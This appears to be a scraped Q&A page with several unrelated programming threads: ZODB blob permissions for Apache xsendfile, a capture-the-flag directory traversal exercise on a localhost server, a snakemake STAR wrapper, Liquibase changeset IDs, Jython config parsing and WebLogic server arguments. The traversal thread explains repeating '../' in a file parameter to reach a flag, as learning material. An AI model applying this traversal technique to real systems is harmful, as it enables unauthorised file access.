collective.xsendfile, ZODB blobs and UNIX file permissions - blob

I am currently trying to configure collective.xsendfile, Apache mod_xsendfile and Plone 4.
Apparently the Apache process does not see blobstrage files on the file system because they contain permissions:
ls -lh var/blobstorage/0x00/0x00/0x00/0x00/0x00/0x18/0xd5/0x19/0x038ea09d0eddc611.blob
-r-------- 1 plone plone 1006K May 28 15:30 var/blobstorage/0x00/0x00/0x00/0x00/0x00/0x18/0xd5/0x19/0x038ea09d0eddc611.blob
How do I configure blobstorage to give additional permissions, so that Apache could access these files?

The modes with which the blobstorage writes it's directories and files is hardcoded in ZODB.blob. Specifically, the standard ZODB.blob.FileSystemHelper class creates secure directories (only readable and writable for the current user) by default.
You could provide your own implementation of FileSystemHelper that would either make this configurable, or just sets the directory modes to 0750, and then patch ZODB.blob.BlobStorageMixin to use your class instead of the default:
import os
from ZODB import utils
from ZODB.blob import FilesystemHelper, BlobStorageMixin
from ZODB.blob import log, LAYOUT_MARKER
class GroupReadableFilesystemHelper(FilesystemHelper):
def create(self):
if not os.path.exists(self.base_dir):
os.makedirs(self.base_dir, 0750)
log("Blob directory '%s' does not exist. "
"Created new directory." % self.base_dir)
if not os.path.exists(self.temp_dir):
os.makedirs(self.temp_dir, 0750)
log("Blob temporary directory '%s' does not exist. "
"Created new directory." % self.temp_dir)
if not os.path.exists(os.path.join(self.base_dir, LAYOUT_MARKER)):
layout_marker = open(
os.path.join(self.base_dir, LAYOUT_MARKER), 'wb')
layout_marker.write(self.layout_name)
else:
layout = open(os.path.join(self.base_dir, LAYOUT_MARKER), 'rb'
).read().strip()
if layout != self.layout_name:
raise ValueError(
"Directory layout `%s` selected for blob directory %s, but "
"marker found for layout `%s`" %
(self.layout_name, self.base_dir, layout))
def isSecure(self, path):
"""Ensure that (POSIX) path mode bits are 0750."""
return (os.stat(path).st_mode & 027) == 0
def getPathForOID(self, oid, create=False):
"""Given an OID, return the path on the filesystem where
the blob data relating to that OID is stored.
If the create flag is given, the path is also created if it didn't
exist already.
"""
# OIDs are numbers and sometimes passed around as integers. For our
# computations we rely on the 64-bit packed string representation.
if isinstance(oid, int):
oid = utils.p64(oid)
path = self.layout.oid_to_path(oid)
path = os.path.join(self.base_dir, path)
if create and not os.path.exists(path):
try:
os.makedirs(path, 0750)
except OSError:
# We might have lost a race. If so, the directory
# must exist now
assert os.path.exists(path)
return path
def _blob_init_groupread(self, blob_dir, layout='automatic'):
self.fshelper = GroupReadableFilesystemHelper(blob_dir, layout)
self.fshelper.create()
self.fshelper.checkSecure()
self.dirty_oids = []
BlobStorageMixin._blob_init = _blob_init_groupread
Quite a hand-full, you may want to make this a feature request for ZODB3 :-)

While setting up a backup routine for a ZOPE/ZEO setup, I ran into the same problem with blob permissions.
After trying to apply the monkey patch that Mikko wrote (which is not that easy) i came up with a "real" patch to solve the problem.
The patch suggested by Martijn is not complete, it still does not set the right mode on blob files.
So here's my solution:
1.) Create a patch containing:
Index: ZODB/blob.py
===================================================================
--- ZODB/blob.py (Revision 121959)
+++ ZODB/blob.py (Arbeitskopie)
## -337,11 +337,11 ##
def create(self):
if not os.path.exists(self.base_dir):
- os.makedirs(self.base_dir, 0700)
+ os.makedirs(self.base_dir, 0750)
log("Blob directory '%s' does not exist. "
"Created new directory." % self.base_dir)
if not os.path.exists(self.temp_dir):
- os.makedirs(self.temp_dir, 0700)
+ os.makedirs(self.temp_dir, 0750)
log("Blob temporary directory '%s' does not exist. "
"Created new directory." % self.temp_dir)
## -359,8 +359,8 ##
(self.layout_name, self.base_dir, layout))
def isSecure(self, path):
- """Ensure that (POSIX) path mode bits are 0700."""
- return (os.stat(path).st_mode & 077) == 0
+ """Ensure that (POSIX) path mode bits are 0750."""
+ return (os.stat(path).st_mode & 027) == 0
def checkSecure(self):
if not self.isSecure(self.base_dir):
## -385,7 +385,7 ##
if create and not os.path.exists(path):
try:
- os.makedirs(path, 0700)
+ os.makedirs(path, 0750)
except OSError:
# We might have lost a race. If so, the directory
# must exist now
## -891,7 +891,7 ##
file2.close()
remove_committed(f1)
if chmod:
- os.chmod(f2, stat.S_IREAD)
+ os.chmod(f2, stat.S_IRUSR | stat.S_IRGRP)
if sys.platform == 'win32':
# On Windows, you can't remove read-only files, so make the
You can also take a look at the patch here -> http://pastebin.com/wNLYyXvw
2.) Store the patch under name 'blob.patch' in your buildout root directory
3.) Extend your buildout configuration:
parts +=
patchblob
postinstall
[patchblob]
recipe = collective.recipe.patch
egg = ZODB3
patches = blob.patch
[postinstall]
recipe = plone.recipe.command
command =
chmod -R g+r ${buildout:directory}/var
find ${buildout:directory}/var -type d | xargs chmod g+x
update-command = ${:command}
The postinstall sections sets desired group read permissions on already existing blobs. Note, also execute permission must be given to the blob folders, that group can enter the directories.
I've tested this patch with ZODB 3.10.2 and 3.10.3.
As Martijn suggested, this should be configurable and part of the ZODB directly.

Related

Traverse directory at URL to root in Python

How can you traverse directory to get to root in Python? I wrote some code using BeautifulSoup, but it says 'module not found'. So I have this:
#
# There is a directory traversal vulnerability in the
# following page http://127.0.0.1:8082/humantechconfig?file=human.conf
# Write a script which will attempt various levels of directory
# traversal to find the right amount that will give access
# to the root directory. Inside will be a human.conf with the flag.
#
# Note: The script can timeout if this occurs try narrowing
# down your search
import urllib.request
import os
req = urllib.request.urlopen("http://127.0.0.1:8082/humantechconfig?file=human.conf")
dirName = "/tmp"
def getListOfFiles(dirName):
listOfFile = os.listdir(dirName)
allFiles = list()
for entry in listOfFile:
# Create full path
fullPath = os.path.join(dirName, entry)
if os.path.isdir(fullPath):
allFiles = allFiles + getListOfFiles(fullPath)
else:
allFiles.append(fullPath)
return allFiles
listOfFiles = getListOfFiles(dirName)
print(listOfFiles)
for file in listOfFiles:
if file.endswith(".conf"):
f = open(file, "r")
print(f.read())
This outputs:
/tmp/level-0/level-1/level-2/human.conf
User : Human 66
Flag: Not-Set (Must be Root Human)
However. If I change the URL to 'http://127.0.0.1:8082/humantechconfig?file=../../../human.conf' it gives me the output:
User : Human 66
Flag: Not-Set (Must be Root Human)
User : Root Human
Flag: Well done the flag is: {}
The level of directory traversal it is at fluctuates wildly, from /tmp/level-2 to /tmp/level-15; if it's at the one I wrote, then it says I'm 'Root Human'. But it won't give me the flag, despite the fact that I am suddenly 'Root Human'. Is there something wrong with the way I am traversing directory?
It doesn't seem to matter at all if I take away the req = urllib.request.urlopen("http://127.0.0.1:8082/humantechconfig?file=human.conf") line. How can I actually send the code to that URL?
Thanks!
cyber discovery moon base challenge?
For this one, you need to keep adding '../' in front of human.conf (for example 'http://127.0.0.1:8082/humantechconfig?file=../human.conf') which becomes your URL. This URL you need to request (using urllib.request.urlopen(URL)).
The main bit of the challenge is to attach the ../ multiple times which shall not be very hard using a simple loop. You don't need to use the OS.
Make sure to break the loop once you find the flag (or it will go into an infinite loop and give you errors).

snakemake STAR module issue and extra question

I discovered that the snakemake STAR module outputs as 'BAM Unsorted'.
Q1:Is there a way to change this to:
--outSAMtype BAM SortedByCoordinate
When I add the option in the 'extra' options I get an error message about duplicate definition:
EXITING: FATAL INPUT ERROR: duplicate parameter "outSAMtype" in input "Command-Line"
SOLUTION: keep only one definition of input parameters in each input source
Nov 15 09:46:07 ...... FATAL ERROR, exiting
logs/star/se/UY2_S7.log (END)
Should I consider adding a sorting module behind STAR instead?
Q2: How can I take a module from the wrapper repo and make it a local module, allowing me to edit it?
the code:
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2016, Johannes Köster"
__email__ = "koester#jimmy.harvard.edu"
__license__ = "MIT"
import os
from snakemake.shell import shell
extra = snakemake.params.get("extra", "")
log = snakemake.log_fmt_shell(stdout=True, stderr=True)
fq1 = snakemake.input.get("fq1")
assert fq1 is not None, "input-> fq1 is a required input parameter"
fq1 = [snakemake.input.fq1] if isinstance(snakemake.input.fq1, str) else snakemake.input.fq1
fq2 = snakemake.input.get("fq2")
if fq2:
fq2 = [snakemake.input.fq2] if isinstance(snakemake.input.fq2, str) else snakemake.input.fq2
assert len(fq1) == len(fq2), "input-> equal number of files required for fq1 and fq2"
input_str_fq1 = ",".join(fq1)
input_str_fq2 = ",".join(fq2) if fq2 is not None else ""
input_str = " ".join([input_str_fq1, input_str_fq2])
if fq1[0].endswith(".gz"):
readcmd = "--readFilesCommand zcat"
else:
readcmd = ""
outprefix = os.path.dirname(snakemake.output[0]) + "/"
shell(
"STAR "
"{extra} "
"--runThreadN {snakemake.threads} "
"--genomeDir {snakemake.params.index} "
"--readFilesIn {input_str} "
"{readcmd} "
"--outSAMtype BAM Unsorted "
"--outFileNamePrefix {outprefix} "
"--outStd Log "
"{log}")
Q1:Is there a way to change this to:
--outSAMtype BAM SortedByCoordinate
I would add another sorting rule after the wrapper as it is the most 'standardized` way of doing it. You can also use another wrapper for sorting.
There is an explanation from the author of snakemake for the reason why the default is unsorted and why there is no option for sorted output in the wrapper:
https://bitbucket.org/snakemake/snakemake/issues/440/pre-post-wrapper
Regarding the SAM/BAM issue, I would say any wrapper should always output the optimal file format. Hence, whenever I write a wrapper for a read mapper, I ensure that output is not SAM. Indexing and sorting should not be part of the same wrapper I think, because such a task has a completely different behavior regarding parallelization. Also, you would loose the mapping output if something goes wrong during the sorting or indexing.
Q2: How can I take a module from the wrapper repo and make it a local module, allowing me to edit it?
If you wanted to do this, one way would be to download the local copy of the wrapper. Change in the shell portion of the downloaded wrapper Unsorted to {snakemake.params.outsamtype}. In your Snakefile change (wrapper to script, path/to/downloaded/wrapper and add the outsamtype parameter):
rule star_se:
input:
fq1 = "reads/{sample}_R1.1.fastq"
output:
# see STAR manual for additional output files
"star/{sample}/Aligned.out.bam"
log:
"logs/star/{sample}.log"
params:
# path to STAR reference genome index
index="index",
# optional parameters
extra="",
outsamtype = "SortedByCoordinate"
threads: 8
script:
"path/to/downloaded/wrapper"
I think a separate rule w/o a wrapper for sorting or even making your own star rule rather is better. Modifying the wrapper defeats the whole purpose of it.

Liquibase: changeset auto generate ID

How to auto generate ID of changeset with liquibase?
I don't want to set the ID of every changeset manually, is there a way to do it automatically?
I dont think that generated ids are a good idea. The reason is that liquibase uses the changeSet id to calculate the checksum (in addition to the author and fileName). So if you ever insert a changeSet between others the checksums of all subsequent changeSets will change and you will get tons of warnings/errors.
Anyway i can think of those solutions if you still want to generate Ids:
create your own ChangeLogParser
If you parse the ChangeLog on your own you are free to generate the ids as you want.
The downside is that you will have to provide a custom Xml Schema for the changeLog. The schema from Liquibase has a constraint on changeSet ids (required). With a new schema you'll probably have to do a significant amount of tweaking on the parser.
Alternatively you may choose another changeLog Format (YAML, JSON, Groovy). Their parsers may be easier to customize as they do not need that schema definition.
Do some preprocessing
You may write a simple xslt (Xml transformation) that generates a changeLog with changeSet ids, from a file that has none.
use timestamps as Ids
This would be my advice. It does not solve the question the way you asked, but it is simple, consistent, provides additional information and is a good practice for other database migration tools as well http://www.jeremyjarrell.com/using-flyway-db-with-distributed-version-control/
I wrote a Python script to generate unique IDs into Liquibase changelogs.
Be careful!
DO generate IDs
when the changelog is in development or ready for release
or when you control the checksums of the target database
DON'T generate IDs
- when the changelog(s) are deployed already
"""
###############################################################################
Purpose: Generate unique subsequent IDs into Liquibase changelogs
###############################################################################
Args:
param1: Full Windows path changelog directory (optional)
OR
--inplace: directly process changelogs (optional)
By default, XML files in the current directory are processed.
Returns:
In case of success, the output path is returned to stdout.
Otherwise, we crash and drag the system into mordor.
If you feel like wasting time you can:
a) port path handling to *nix
b) handle any obscure exceptions
c) add Unicode support (for better entertainment)
Dependencies:
Besides Python 3, in order to preserve XML comments, I had to use lxml
instead of the stock ElementTree parser.
Install lxml:
$ pip install lxml
Proxy clusterfuck? Don't panic! Simply download a .whl package from:
https://pypi.org/project/lxml/#files and install with pip.
Bugs:
Changesets having id="0" are ignored. Usually, these do not occur.
Author:
Tobias Bräutigam
Versions:
0.0.1 - re based, deprecated
0.0.2 - parse XML with lxml, CURRENT
"""
import datetime
import sys
import os
from pathlib import Path, PureWindowsPath
try:
import lxml.etree as ET
except ImportError as error:
print ('''
Error: module lxml is missing.
Please install it:
pip install lxml
''')
exit()
# Process arguments
prefix = '' # hold separator, if needed
outdir = 'out'
try: sys.argv[1]
except: pass
else:
if sys.argv[1] == '--inplace':
outdir = ''
else:
prefix = outdir + '//'
# accept Windows path syntax
inpath = PureWindowsPath(sys.argv[1])
# convert path format
inpath = Path(inpath)
os.chdir(inpath)
try: os.mkdir(outdir)
except: pass
filelist = [ f for f in os.listdir(outdir) ]
for f in filelist: os.remove(os.path.join(outdir, f))
# Parse XML, generate IDs, write file
def parseX(filename,prefix):
cnt = 0
print (filename)
tree = ET.parse(filename)
for node in tree.getiterator():
if int(node.attrib.get('id', 0)):
now = datetime.datetime.now()
node.attrib['id'] = str(int(now.strftime("%H%M%S%f"))+cnt*37)
cnt = cnt + 1
root = tree.getroot()
# NS URL element name is '' for Etree, lxml requires at least one character
ET.register_namespace('x', u'http://www.liquibase.org/xml/ns/dbchangelog')
tree = ET.ElementTree(root)
tree.write(prefix + filename, encoding='utf-8', xml_declaration=True)
print(str(cnt) +' ID(s) generated.')
# Process files
print('\n')
items = 0
for infile in os.listdir('.'):
if (infile.lower().endswith('.xml')) == True:
parseX(infile,prefix)
items=items+1
# Message
print('\n' + str(items) + ' file(s) processed.\n\n')
if items > 0:
print('Output was written to: \n\n')
print(str(os.getcwd()) + '\\' + outdir + '\n')

Jython - importing a text file to assign global variables

I am using Jython and wish to import a text file that contains many configuration values such as:
QManager = MYQM
ProdDBName = MYDATABASE
etc.
.. and then I am reading the file line by line.
What I am unable to figure out is now that as I read each line and have assigned whatever is before the = sign to a local loop variable named MYVAR and assigned whatever is after the = sign to a local loop variable MYVAL - how do I ensure that once the loop finishes I have a bunch of global variables such as QManager & ProdDBName etc.
I've been working on this for days - I really hope someone can help.
Many thanks,
Bret.
See other question: Properties file in python (similar to Java Properties)
Automatically setting global variables is not a good idea for me. I would prefer global ConfigParser object or dictionary. If your config file is similar to Windows .ini files then you can read it and set some global variables with something like:
def read_conf():
global QManager
import ConfigParser
conf = ConfigParser.ConfigParser()
conf.read('my.conf')
QManager = conf.get('QM', 'QManager')
print('Conf option QManager: [%s]' % (QManager))
(this assumes you have [QM] section in your my.conf config file)
If you want to parse config file without help of ConfigParser or similar module then try:
my_options = {}
f = open('my.conf')
for line in f:
if '=' in line:
k, v = line.split('=', 1)
k = k.strip()
v = v.strip()
print('debug [%s]:[%s]' % (k, v))
my_options[k] = v
f.close()
print('-' * 20)
# this will show just read value
print('Option QManager: [%s]' % (my_options['QManager']))
# this will fail with KeyError exception
# you must be aware of non-existing values or values
# where case differs
print('Option qmanager: [%s]' % (my_options['qmanager']))

WebLogic - Using environment variable / double quotes in "Arguments" in "Server Start"

I have an admin server, NodeManager, and 1 managed server, all on the same machine.
I am trying to enter something similar to this to the arguments field in the Server Start tab:
-Dmy.property=%USERPROFILE%\someDir\someJar.jar
But when the managed server is started it throws this exception:
Error opening zip file or JAR manifest missing : %USERPROFILE%\someDir\someJar.jar
It appears that the environment variable is not being translated into it's value. It is just passed on to the managed server as plain-text.
I tried surrounding the path with double quotes (") but the console validates the input and does not allow this: "Arguments may not contain '"'"
Even editing the config.xml file manually cannot work, as the admin server fails to startup after this:
<Critical> <WebLogicServer> <BEA-000362> <Server failed. Reason: [Management:141266]Parsing failure in config.xml: java.lang
.IllegalArgumentException: Arguments may not contain '"'.>
I also tried using %20 to no avail, it is just passed as %20.
I thought that perhaps this had something to do with the spaces in the value of %USERPROFILE% (which is "C:\documents and settings.."), but the same thing happens with other env. variables which point to other directories with no spaces.
My question:
Is there any supported way of :
using double quotes? what if i have to reference a folder with spaces in it's name?
reference an environment variable? What if i have to rely on it's value for distributed servers where i do not know in advance the variable's value?
Edit based on comments:
Approach 1:
Open setDomainEnv.cmd and search for export SERVER_NAME in Linux or for set SERVER_NAME in Windows. Skip to next to next line (i.e skip current and the next line)
On the current line, insert:
customServerList="server1,server2" #this serverList should be taken as input
isCurrServerCustom=$(echo ${customServerList} | tr ',' '\n' | grep ${SERVER_NAME} | wc -l)
if [ $isCurrServerCustom -gt 0 ]; then
# add customJavaArg
JAVA_OPTIONS="-Dmy.property=${USERPROFILE}/someDir/someJar.jar"
fi
Save the setDomainEnv.sh file and re-start servers
Note that I have only given logic for Linux , for Windows similar logic can be used but with batch scripting syntax.
Approach 2:
Assuming domain is already installed and user provides the list of servers to which the JVM argument -Dmy.property need to be added. Jython script (use wlst.sh to execute). WLST Reference.
Usage: wlst.sh script_name props_file_location
import os
from java.io import File
from java.io import FileInputStream
# extract properties from properties file.
print 'Loading input properties...'
propsFile = sys.argv[1]
propInputStream = FileInputStream(propsFile)
configProps = Properties()
configProps.load(propInputStream)
domainDir = configProps.get("domainDir")
# serverList in properties file should be comma seperated
serverList = configProps.get("serverList")
# The current machine's logical name as mentioned while creating the domain has to be given. Basically the machine name on which NM for current host is configured on.
# This param may not be required as an input if the machine name is configured as same as the hostname , in which case , socket module can be imported and socket.getHostName can be used.
currMachineName = configProps.get("machineName")
jarDir = os.environ("USERPROFILE")
argToAdd = '-Dmy.property=' + jarDir + File.separator + 'someDir' + File.separator + 'someJar.jar'
readDomain(domainDir)
for srvr in serverList.split(",") :
cd('/Server/' + srvr)
listenAddr = get('ListenAddress')
if listenAddr != currMachineName :
# Only change current host's servers
continue
cd('/Server/' + srvr + '/ServerStart/' + srvr)
argsOld = get('Arguments')
if argsOld is not None :
set('Arguments', argsOld + ' ' + argToAdd)
else:
set('Arguments', argToAdd)
updateDomain()
closeDomain()
# now restart all affected servers (i.e serverList)
# one way is to connect to adminserver and shutdown them and then start again
Script has to be run from all hosts where the managed servers are going to be deployed in order to have the host specific value of "USERPROFILE" in the JVM argument.
BTW, to answer your question in a line : looks like the JVM arguments have to be supplied with the literal text eventually. But looks like WLS doesn't translate the environment variables if provided as JVM arguments. It gives an impression that it is translating when its done from startWebLogic.cmd (ex: using %DOMAIN_HOME% etc.) but its the shell/cmd executor that translates and then starts the JVM.